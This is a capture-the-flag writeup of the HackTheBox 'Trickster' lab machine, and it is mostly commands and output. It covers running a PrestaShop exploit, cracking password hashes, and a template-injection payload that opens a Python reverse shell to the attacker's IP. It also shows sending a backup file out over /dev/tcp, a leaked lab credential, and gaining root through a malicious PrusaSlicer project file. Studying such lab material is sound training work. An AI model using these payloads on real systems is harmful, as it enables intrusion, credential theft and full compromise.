Post

HackTheBox Trickster Writeup

Posted
By x3ric
5 min read

Explore the fundamentals of cybersecurity in the Trickster Capture The Flag (CTF) challenge, a medium-level experience, ideal for those seeking to advance their skills! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it a great stepping stone for those familiar with basic security techniques looking to tackle more complex scenarios.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.34 trickster.htb shop.trickster.htb

Script to add hosts automatically

1
2

ip="10.10.11.34";domain="trickster.htb shop.trickster.htb"
sudo grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV trickster.htb

1
2
3
4
5
6
7
8
9
10
11
12
13

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 21:16 CEST
Nmap scan report for trickster.htb (10.10.11.34)
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2024-34716 (PrestaShop)

1
2
3
4

git clone https://github.com/aelmokhtar/CVE-2024-34716
cd CVE-2024-34716
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py --url 'http://shop.trickster.htb' --email 'adam@trickster.htb' --local-ip $vpnip --admin-path 'admin634ewutrx1gitlooaj'

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1

export TERM=xterm;

Find Database Credentials

1

timeout 1 find /var/www -type f -name "*.php" -exec grep -Hn 'database_' {} \; 2>/dev/null

Use the found credentials to access the MySQL database:

1

mysql -h 127.0.0.1 -u <user> -p

Inside MySQL:

1
2

USE prestashop;
SELECT id_employee, email, passwd FROM ps_employee;

Brute Force the Hash

Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.

1
2
3
4
5

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt

SSH Access

After cracking the password, use it to SSH:

1

ssh james@trickster.htb

Ping Sweep for Active Hosts

You may discover a container at 172.17.0.1 by checking network interfaces. Perform a ping sweep to identify active hosts:

1
2
3
4
5
6
7
8
9
10

subnet="172.17"
(
for i in {0..255}; do
  for j in {1..254}; do
    ip="$subnet.$i.$j"
    (ping -c 1 -W 1 $ip >/dev/null 2>&1 && echo "Host $ip is up") &
  done
done
wait
)

You should find 172.17.0.2.

Scan Ports of 172.17.0.2

Scan the ports:

1

nc -zv 172.17.0.2 1-65535 2>&1 | grep succeeded

If nc isn’t available, use the bash alternative:

1
2
3
4
5

(
for port in {1..65535}; do
 (echo > /dev/tcp/172.17.0.2/$port) >/dev/null 2>&1 && echo "Port $port is open" &
done
)

Port 5000 is open.

Forward Port 5000 for Local Access

1

ssh -L 5000:172.17.0.2:5000 james@trickster.htb

CVE-2024-32651 (Change.io Exploit)

Log in to Change.io using James’ credentials.

Host a Python HTTP server:

1

python -m http.server

Set up a listener for the reverse shell:

1

nc -lvnp 9001

Replace <vpn-ip> with your actual VPN IP to receive the connection.

Create a new “watch” on http://vpn-ip:8000. In the notification settings:

Notification URL:

1

gets://

Notification Body:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

1
2
3
4
5

{% for x in ().__class__.__base__.__subclasses__() %}
  {% if "warning" in x.__name__ %}
    {{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"vpn-ip\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
  {% endif %}
{% endfor %}

To trigger the watch, create a file in the HTTP server:

1

touch file

Visit the Change.io main page and manually retrigger the watcher by clicking the retrigger option.

PrivEsc

To retrieve a backup file from the target, set up a listener on your local machine using nc. This will allow you to receive the file when it’s sent from the target.

1

nc -lvnp 4445 > changedetection-bak.zip

On the target machine, use the following command to send the backup file to your local machine through the open listener.

1

cat /datastore/Backups/changedetection-backup-20240830194841.zip > /dev/tcp/vpn-ip/4445

After receiving the file, close the listener and extract the contents of the zip file. Use brotli to decompress any .br files you find and then read their contents.

1
2
3

unzip changedetection-bak.zip
brotli -d b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
cat ./b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt

Within the extracted file, you will find the credentials for the user adam:

1

adam:adam_admin992

To gain access to the target, log in as adam:

1

su adam

Next, check the sudo privileges available to the adam user to see what commands can be executed with elevated permissions.

1

sudo -l

You should see output indicating that adam can run PrusaSlicer with elevated privileges without needing to provide a password:

1
2

User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

This means you can exploit the application by running sudo /opt/PrusaSlicer/prusaslicer without needing a password.

CVE-2023-47268 (PrusaSlicer)

https://www.exploit-db.com/exploits/51983

You can exploit the .3mf file by copying it via scp, modifying Slic3r_PE.config to add chmod u+s /bin/bash, repacking it, and uploading it back to the target for execution with PrusaSlicer to gain root privileges.

1
2
3
4
5
6
7
8
9
10

scp adam@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf Trickster.3mf
unzip Trickster.3mf Metadata/Slic3r_PE.config -d ./tmp
sed -i 's/^.*post_process.*/; post_process = "chmod u+s \/bin\/bash"/' ./tmp/Metadata/Slic3r_PE.config
sed -i 's/^.*output_filename_format.*/; output_filename_format = exploit.gcode/' ./tmp/Metadata/Slic3r_PE.config
cd ./tmp
zip -r -Z deflate ../Trickster.3mf ./*
cd ..
rm -rf ./tmp
scp Trickster.3mf adam@trickster.htb:/tmp/
rm -rf Trickster.3mf Trickster.3mf

On the target machine, execute PrusaSlicer with the modified file:

1
2

sudo /opt/PrusaSlicer/prusaslicer -s /tmp/Trickster.3mf
bash -p

At this point, you should have elevated privileges and can access sensitive files such as /root/root.txt.

1

cat /root/root.txt
machine
htb cft writeup linux
This post is licensed under CC BY 4.0 by the author.